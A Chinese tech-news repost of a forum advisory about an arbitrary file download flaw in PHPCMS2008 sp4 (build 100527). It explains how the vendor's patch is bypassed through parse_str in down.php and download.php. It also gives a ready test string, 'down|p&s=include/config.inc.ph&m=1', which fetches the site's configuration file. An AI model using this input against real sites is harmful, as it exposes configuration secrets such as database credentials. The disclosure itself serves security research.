软件下载 | 资讯教程 | 最近更新 | 下载排行 | 一键转帖 | 发布投稿
您的位置:最火下载站 > 资讯阅读 > 站长新闻 > PHPCMS2008 100527版爆下载任意文件漏洞

PHPCMS2008 100527版爆下载任意文件漏洞

  烈火网(LieHuo.Net)5月28日消息,今天下午,有PHPCMS用户向烈火网反映说,在PC论坛发现了PHPCMS2008 100527版本下载任意文件漏洞,目前官方还没有站出来表态和解决问题,烈火将继续关注。

  以下为论坛原文:

影响版本:
phpcms2008sp4_utf8_100527
漏洞描述:

phpcms2008sp4 下载任意文件漏洞发布后,

27号官方的补丁是这样的:
down.php
if(preg_match('/\.php/i',$f) || strpos($f, ":\\")) showmessage('地址有误'); //12行
没补丁前是这样的:
if(preg_match('/\.php$/',$f) || strpos($f, ":\\")) showmessage('地址有误'); //12行可以看出两者的区别。

但同样是这个文件中:parse_str($a_k);//8行知道这里还有更好的利用方法了,
再看文件:download.phpif($m) $fileurl = trim($s).trim($fileurl); //25行左右 什么也不说,利用parse_str方法,

可以下载任意文件。而且,parse_str的利用,还可以利用到其他地方,如覆盖下面的某些变量的利用。

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!注册会员发布一篇下载的文章(不需要通过审核)下载地址填上:down|p&s=include/config.inc.ph&m=1然后预览,再点下载即可。

    相关阅读
    栏目导航
    推荐软件